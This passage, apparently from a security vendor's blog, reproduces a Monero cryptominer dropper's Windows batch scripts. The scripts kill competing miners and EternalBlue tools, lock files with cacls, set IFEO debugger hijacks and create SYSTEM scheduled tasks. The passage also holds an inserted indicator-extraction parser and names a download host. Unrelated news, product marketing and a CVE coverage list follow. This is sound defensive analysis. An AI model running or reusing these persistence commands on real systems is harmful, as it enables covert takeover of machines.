echo y|cacls c:\wax.exe /d everyone
@echo y|cacls C:\ProgramData\Natihial\svshostr.exe /d everyone
@echo y|cacls C:\ProgramData\Microsoft\Natihial\cmd.exe /d everyone
echo y|cacls C:\ProgramData\expl0rer.exe /d everyone
@echo y|cacls C:\windows\svchost.exe /d everyone
@Wmic Process Where "Name='cmd.exe' And ExecutablePath='C:\\ProgramData\\Microsoft\\Natihial\\cmd.exe'" Call Terminate
@schtasks /delete /tn "Adobe Flash Player Updaters" /f
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\Windows\\svchost.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\dll\\svchost.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\dll\\csrss.exe'" call Terminate
@wmic process where "name='svchost.exe' and ExecutablePath='C:\\ProgramData\\Natioanl\\svchostr.exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\Microsoft\\Natioanl\\csrss..exe'" call Terminate
@wmic process where "name='csrss.exe' and ExecutablePath='C:\\ProgramData\\nm\\winlogin.exe'" call Terminate
md %SystemRoot%\svchost.exe
attrib +s +h +r %SystemRoot%\svchost.exe
echo y|cacls %SystemRoot%\svchost.exe /d everyone
taskkill /f /t /im tasksche.exe
md %SystemRoot%\tasksche.exe
attrib +s +h +r %SystemRoot%\tasksche.exe
echo y|cacls %SystemRoot%\tasksche.exe /d everyone
taskkill /f /t /im srvany.exe
md %SystemRoot%\srvany.exe
attrib +s +h +r %SystemRoot%\srvany.exe
echo y|cacls %SystemRoot%\srvany.exe /d everyone
taskkill /f /t /im WUDHostServices.exe
md %SystemRoot%\System32\WUDHostServices.exe
attrib +s +h +r %SystemRoot%\System32\WUDHostServices.exe
echo y|cacls %SystemRoot%\System32\WUDHostServices.exe /d everyone
@taskkill /f /im wbmoney.exe
@taskkill /f /im GGtbviewer.exe
taskkill /f /t /im Netohad.pif
taskkill /f /t /im Qrhkveb.com
taskkill /f /t /im Tnntknl.com
taskkill /f /t /im Snwhtdw.bat
taskkill /f /t /im dllhsot.exe
taskkill /f /t /im Tasksvr.exe
taskkill /f /t /im serices.exe
taskkill /f /t /im seever.exe
taskkill /f /t /im mssecsvc.exe
taskkill /f /t /im svchsot.exe
taskkill /f /t /im lsacs.exe
taskkill /f /t /im nsa.exe
taskkill /f /t /im csrs.exe
taskkill /f /im WerFault.exe
taskkill /f /im WScript.exe
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\system\\explorer.exe'" call Terminate
@wmic process where "name='explorer.exe' and ExecutablePath='C:\\Windows\\Fonts\\explorer.exe'" call Terminate
@wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\Fonts\\conhost.exe'" call Terminate
@reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smss.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundllhost.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe" /f
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Systmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ystmss.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wuauc1t.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\2.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\1.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\3.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nanol.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostr.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe" /v "debugger" /d taskkill.exe /f
@del /q C:\Windows\system\explorer.exe
@del /q C:\Windows\Fonts\explorer.exe
@taskkill /f /t /im lservice.exe
@taskkill /f /t /im ystmss.exe
@taskkill /f /t /im wuauc1t.exe
del %0

Free.bat, launched through the RavTask task, performs the final cleanup of the install process: it kills the exploit tools, CPUInfo.exe and a few other processes, waits, and then re-runs the GooglePinginConfigs task so that CPUInfo.exe starts again.


@ECHO OFF
ping -n 2 127.0.0.1>nul
taskkill /f /t /im NV-NO.exe
taskkill /f /t /im NV.exe
taskkill /f /t /im Eternalblue-2.2.0.exe
taskkill /f /t /im Eternalchampion-2.0.0.exe
taskkill /f /t /im Doublepulsar-1.3.1.exe
taskkill /f /im mysqld.exe
taskkill /f /im CPUInfo.exe
taskkill /f /im jvav.exe
ping -n 5 127.0.0.1>nul
schtasks /run /tn "GooglePinginConfigs"
exit
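The three batch files above are the malware's own persistence and takeover logic. As an added example (not code from the Capture Labs write-up or from the malware), the following Python triage parser pulls the scheduled tasks, IFEO “debugger” hijacks, service deletions, kill lists and directory squats out of such a script into a structured summary that can be turned into host-hunting queries. The SAMPLE string is an abridged copy of the Demo.bat and Demc.bat lines shown above; the record names (BatchIocs and its fields) are my own, and the parser only understands the handful of cmd verbs these scripts use.

```python
"""Triage parser for the dropper's cmd batch scripts (added example; not code
from the Capture Labs write-up or from the malware). It pulls the scheduled
tasks, IFEO "debugger" hijacks, service deletions, kill lists and directory
squats out of batch text. SAMPLE is an abridged copy of the Demo.bat/Demc.bat
lines in the analysis; the record names are my own, and only the few cmd
verbs those scripts use are understood."""
import re
from dataclasses import dataclass, field

IFEO_KEY = "image file execution options\\"
_TOKEN = re.compile(r'"[^"]*"|\S+')

@dataclass
class BatchIocs:
    tasks: dict = field(default_factory=dict)           # task name -> command/schedule/run-as
    ifeo_hijacks: dict = field(default_factory=dict)    # image name -> "debugger" value
    ifeo_cleared: list = field(default_factory=list)    # IFEO entries the script removes
    services_removed: list = field(default_factory=list)
    killed_images: list = field(default_factory=list)   # taskkill /im targets
    killed_paths: list = field(default_factory=list)    # wmic ... ExecutablePath='...' targets
    squatted_paths: list = field(default_factory=list)  # "md x.exe": a directory blocking a file of that name

def tokenize(line: str) -> list:
    """Split on whitespace, honouring (and dropping) double quotes. Backslashes
    are literal in cmd, so shlex, which would eat them, is deliberately avoided."""
    line = line.strip()
    if line.startswith("@"):      # '@' only suppresses echoing of the line
        line = line[1:]
    return [t.strip('"') for t in _TOKEN.findall(line)]

def switches(args: list) -> dict:
    """Map '/x value' pairs to a dict; bare switches such as /f map to True."""
    opts, i = {}, 0
    while i < len(args):
        if args[i].startswith("/"):
            key = args[i][1:].lower()
            if i + 1 < len(args) and not args[i + 1].startswith("/"):
                opts[key] = args[i + 1]
                i += 1
            else:
                opts[key] = True
        i += 1
    return opts

def parse_batch(text: str) -> BatchIocs:
    iocs = BatchIocs()
    for raw in text.splitlines():
        toks = tokenize(raw)
        if not toks:
            continue
        verb, args = toks[0].lower(), toks[1:]
        if verb == "schtasks" and args and args[0].lower() == "/create":
            o = switches(args)
            iocs.tasks[o.get("tn")] = {"command": o.get("tr"), "schedule": o.get("sc"),
                                       "modifier": o.get("mo"), "run_as": o.get("ru")}
        elif verb == "reg" and len(args) >= 2 and IFEO_KEY in args[1].lower():
            image = args[1].rsplit("\\", 1)[1]      # last path component of the IFEO key
            o = switches(args[2:])
            if args[0].lower() == "add" and str(o.get("v", "")).lower() == "debugger":
                iocs.ifeo_hijacks[image] = o.get("d")
            elif args[0].lower() == "delete":
                iocs.ifeo_cleared.append(image)
        elif verb == "sc" and len(args) >= 2 and args[0].lower() == "delete":
            iocs.services_removed.append(args[1])
        elif verb == "taskkill":
            image = switches(args).get("im")
            if image:
                iocs.killed_images.append(image)
        elif verb == "wmic":
            m = re.search(r"ExecutablePath='([^']*)'", raw)   # WQL doubles the backslashes
            if m:
                iocs.killed_paths.append(m.group(1).replace("\\\\", "\\"))
        elif verb in ("md", "mkdir") and args and args[0].lower().endswith(".exe"):
            iocs.squatted_paths.append(args[0])
    return iocs

# Constructed sample: an abridged copy of the batch lines reproduced in the analysis.
SAMPLE = r"""
sc config Schedule start= auto
@schtasks /create /sc minute /mo 240 /tn "RavTask" /tr "C:\windows\IIS\free.bat" /ru "system" /f
@schtasks /create /tn "GooglePinginConfigs" /tr "C:\windows\IIS\CPUInfo.exe" /sc onstart /ru "system" /f
@wmic process where "name='server.exe' and ExecutablePath='C:\\program files (x86)\\stormii\\server.exe'" call Terminate
@md "C:\program files (x86)\stormii\server.exe"
taskkill /f /t /im ftp.exe
@sc stop "mssecsvc2.0"
@sc delete "mssecsvc2.0"
md c:\wax.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wax.exe" /v "debugger" /d taskkill.exe /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss..exe" /v "debugger" /d taskkill.exe /f
del %0
"""

if __name__ == "__main__":
    for name, rec in parse_batch(SAMPLE).tasks.items():
        print(name, rec)
```

The output maps directly onto hunting checks: task names and their SYSTEM-level commands under %Windir%\IIS, IFEO subkeys whose debugger value is taskkill.exe, and directories that carry an .exe name (a directory at c:\wax.exe or %SystemRoot%\svchost.exe is never legitimate). A quirk worth keeping in mind when extending the parser is that the wmic lines carry WQL-escaped paths with doubled backslashes, while every other path in the scripts is literal.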

The loaded x64.dll or x86.dll is then responsible for downloading two more components, Install.exe and mado.exe. Install.exe simply reinstalls CPUInfo.exe, so the whole CPUInfo.exe execution cycle restarts and persistence is maintained.

Mado.exe connects to bmw.hobuff.info and downloads another file, which is the main cryptominer. The miner disguises itself as another 360.cn component and uses the same icon as the main installer. On closer examination we find that it mines Monero and is based on the open-source XMRig CPU miner.

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Downloader.AL_5 (Trojan)
  • GAV: Reconyc.DDA_5 (Trojan)
  • GAV: Madominer.D (Trojan)
  • GAV: Madominer.D_2 (Trojan)
  • GAV: Equation.A (Trojan)
  • GAV: XMRig.XMR_3 (Trojan)

Cyber Security News & Trends



SonicWall Spotlight

“A leader has to be passionate about their work be able to motivate their teams to be equally passionate” With Bill Conner – Authority Magazine

  • Bill Conner, CEO of SonicWall, is interviewed about his career, from his days loading shipping containers all the way to his current role.

Cryptomining Malware Steals Fortnite Gamers’ Bitcoins and Personal Data – SC Magazine (UK)

  • As malware continues to target Fortnite players, SonicWall’s Lawrence Pingree talks about the probable future of kinetic ransomware.

Chart of the Day: Google Plus Never Got off the Ground – Real Money

  • SonicWall CEO Bill Conner weighs in with his thoughts on the importance, or not, of the Google Plus breach.

Cyber Security News

Pentagon Struggling to Meet Cyber Challenges, as Modern Warfare Goes High Tech – The Washington Times

  • The Pentagon wants to avoid another “Beast of Kandahar” situation but is struggling to keep its cybersecurity stronger than its attackers.

New Evidence of Hacked Supermicro Hardware Found in U.S. Telecom – Bloomberg

  • Accusations that China is inserting spying chips into US companies’ hardware are still being made and are spreading to other companies.

Medtronic Disables Pacemaker Programmer Updates Over Hack Concern – Reuters

  • There have been no documented reports of the vulnerability being exploited, but the company is taking no chances with people’s hearts.

Vietnam Cyber Law Set for Tough Enforcement Despite Google, Facebook Pleas – Reuters

  • Companies will be required to store a wide range of user data and set up offices inside the country.

Heathrow Airport Fined £120,000 Over USB Data Breach Debacle – ZDNet

  • A memory stick with unencrypted private data of airport employees was found by a member of public last year.

Payment-Card-Skimming Magecart Strikes Again: Zero out of Five for Infecting E-Retail Sites – The Register (UK)

  • The British Airways and Ticketmaster attacking toolkit Magecart isn’t going away, this time turning up in a plugin called Shopper Approved that is used by hundreds of e-commerce sites.

This Cryptojacking Mining Malware Pretends to Be a Flash Update – ZDNet

  • The much-maligned Flash software now has the added problem of an imposter program that uses a victim’s computer to mine for the Monero cryptocurrency.

In Case You Missed It

12 Smart Reasons to Upgrade to SonicWall Secure Mobile Access (SMA)

The modern mobile or remote workforce is one of a business’s most valuable resources. Ensuring users have fast and secure anytime, anywhere access to applications, services and networks is a business-critical function.

For many years, the SonicWall Secure Remote Access (SRA) solution was the workhorse for distributed or remote personnel across the world. But technology moves fast. Today’s business environment has more users, applications and services than ever before. Satisfying this need requires a secure, high-performance remote access solution.

That’s why SonicWall introduced Secure Mobile Access (SMA), a unified secure access gateway that enables organizations to provide anytime, anywhere and any-device access to any application. More memory. More users. More throughput.

The solution’s granular access control policy engine, context-aware device authorization, application-level VPN and advanced authentication with single sign-on enables organizations to move to the cloud with ease, and embrace BYOD and mobility in a hybrid IT environment.

Explore the top 12 reasons organizations are upgrading to SonicWall SMA to deliver the speed, security and user experiences their mobile workforces require.

Shrink Budgets by Going Virtual

Virtualizing your infrastructure provides many benefits, while significantly improving performance needed for today’s secure mobility. Improvements include enhanced scalability and flexibility, reduction in downtime, minimized upfront investment and lower maintenance costs.

Why upgrade: SMA 8200v is a powerful virtual appliance with a quad-core processor and 8 GB of RAM. It delivers high-performance secure remote access at a fraction of the cost of a physical appliance.

Go Faster

Having both more and faster processing cores enables SMA to encrypt data-in-motion and with lower latency. The end result is a faster, high-performance experience for end users.

Why upgrade: The SMA series has quad core processors that run at up to 1.8 times the speed of those on the SRA series (single core on EX6000 and dual core on EX7000).

Increase Your Throughput

While speed is important, the ultimate goal is to deliver a seamless user experience. By increasing throughput, you promote better productivity with fast and secure access to mission-critical cloud and on-premises applications.

Why upgrade: SMA appliances have up to 15 times the SSL-VPN throughput of the SRA EX series (1.58 Gbps/400 Mbps/3.75 Gbps vs. 106 Mbps/550 Mbps).

Serve More Concurrent Users

The mobile workforce has matured quickly in the past decade. Businesses are serving more remote users than ever before, and usually at the same time. Supporting a higher number of concurrent user sessions provides greater scalability: more simultaneous sessions can be active and tracked.

Why upgrade: The SMA series offer more scalability from a single appliance for larger numbers of concurrent user sessions compared to the SRA series.

Get More High-Speed Ports

Today’s applications and cloud services are bandwidth hogs. Whether users are accessing sales data from a SaaS application or streaming a video presentation, organizations need the throughput to support bandwidth-intensive applications and high-speed data transfers.

Why upgrade: SMA 8200v supports two 10-GbE ports, and SMA 7200 includes two 10-GbE ports out of the box.

Keep Features, Firmware Current

One of the most important best practices to defend against cyberattack or unknown threats is to always keep patches current. This habit also ensures you’re getting the latest feature updates to take advantage of new capabilities that help reduce costs while embracing trends such as BYOD, mobility and cloud.

Why upgrade: Every SMA firmware version is packed with new features. For example, SMA OS 12.1 is the current recommended firmware that provides advanced features, such as:

  • Federated Single Sign-On (SSO)
  • Face ID AUTH Support
  • Centralized Access Portal for Hybrid IT
  • File-Scanning via SonicWall Capture ATP Sandbox Service

Retain Support, Warranty for Hardware

Delivering secure remote access is a critical IT function that reduces attack surface for cybercriminals. It is imperative that the solution is always fully supported and has a best-in-class warranty — should the need arise.

Why upgrade: The SRA series is approaching End of Life (EOL), and the appliances will not be supported beyond November 2019.

Centralize Management & Reporting

Management and technology oversight are significant cost centers for businesses. By centralizing management and reporting, and automating routine tasks, organizations can drastically reduce administrative overhead. That’s time better spent on core business or security objectives.

Why upgrade: SonicWall Central Management Server (CMS) provides organizations with a single administrative user interface for reporting and management of all SMA appliances. This even includes SSL certificate management and policy roll-outs.

Enhance Resilience & Availability

Downtime happens. But organizations do their best to ensure business continuity and scalability, not to mention that service-level agreements are met. Service providers vastly improve Quality of Service (QoS) and workforce productivity by being proactive in this area.

Why upgrade: Appliances managed by CMS can be configured as Active/Active or Active/Standby high-availability (HA) clusters for redundancy, availability and reliability. The solution includes Global Traffic Optimizer (GTO) for intelligent load-balancing and universal session persistence in case of failovers.

Store Critical Information with Onboard Memory

While much storage today is outsourced to clouds or servers, having large onboard modules is still a key capability. It allows for the local storage of logs, reports, file transfer inspection, firmware backups and restores, and more.

Why upgrade: The SMA 6200 and 7200 offer storage modules that have 12.5 times the capacity of the SRA series (2 x 500 GB vs. 80 GB).

Reduce Costs by Maximizing Global Usage

Organizations with appliances that are globally distributed can benefit from the fluctuating demands for user licenses due to time differences from off‐work/night hours.

Why upgrade: User licenses no longer need to be applied to individual SMA appliances. With central user licensing, CMS reallocates licenses to managed SMA appliances based on usage.

About SonicWall SMA

SMA is an advanced access security gateway that offers secure access to network and cloud resources from any device. SMA provides centralized, granular, policy-based enforcement of remote and mobile access to any corporate resource delivered using a hardened Linux-based appliance. Available as hardened physical appliances or powerful virtual appliances, SMA fits seamlessly into any existing IT infrastructure.

Microsoft Security Bulletin Coverage for October 2018

SonicWall Capture Labs Threat Research Team has analyzed and addressed Microsoft’s security advisories for the month of October 2018. A list of the issues reported, along with SonicWall coverage information, is as follows:

CVE-2010-3190 MFC Insecure Library Loading Vulnerability
There are no known exploits in the wild.
CVE-2018-8265 Microsoft Exchange Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8320 Windows DNS Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8329 Linux On Windows Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8330 Windows Kernel Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8333 Microsoft Filter Manager Elevation Of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8411 NTFS Elevation of Privilege Vulnerability
ASPY 5282 : Malformed-File exe.MP.38
CVE-2018-8413 Windows Theme API Remote Code Execution Vulnerability
ASPY 5283 : Malformed-File theme.MP
CVE-2018-8423 Microsoft JET Database Engine Remote Code Execution Vulnerability
ASPY 5271 : Malformed-File mdb.TL.4
ASPY 5272 : Malformed-File mdb.TL.5
CVE-2018-8427 Microsoft Graphics Components Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8432 Microsoft Graphics Components Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8448 Microsoft Exchange Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8453 Win32k Elevation of Privilege Vulnerability
ASPY 5284 : Malformed-File exe.MP.39
CVE-2018-8460 Internet Explorer Memory Corruption Vulnerability
IPS 13639 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8472 Windows GDI Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8473 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8480 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8481 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8482 Windows Media Player Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8484 DirectX Graphics Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8486 DirectX Information Disclosure Vulnerability
IPS 5285 : Malformed-File exe.MP.40
CVE-2018-8488 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8489 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8490 Windows Hyper-V Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8491 Internet Explorer Memory Corruption Vulnerability
IPS 13640 : Internet Explorer Memory Corruption Vulnerability (OCT 18) 2
CVE-2018-8492 Device Guard Code Integrity Policy Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8493 Windows TCP/IP Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8494 MS XML Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8495 Windows Shell Remote Code Execution Vulnerability
IPS 13637 : Windows Shell Remote Code Execution Vulnerability (OCT 18) 1
CVE-2018-8497 Windows Kernel Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8498 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8500 Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8501 Microsoft PowerPoint Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8502 Microsoft Excel Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8503 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8504 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2018-8505 Chakra Scripting Engine Memory Corruption Vulnerability
IPS 13636 : Chakra Scripting Engine Memory Corruption Vulnerability (OCT 18) 1
CVE-2018-8506 Microsoft Windows Codecs Library Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8509 Microsoft Edge Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8510 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8511 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8512 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8513 Chakra Scripting Engine Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8518 Microsoft SharePoint Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2018-8527 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8530 Microsoft Edge Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2018-8531 Azure IoT Device Client SDK Memory Corruption Vulnerability
There are no known exploits in the wild.
CVE-2018-8532 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2018-8533 SQL Server Management Studio Information Disclosure Vulnerability
There are no known exploits in the wild.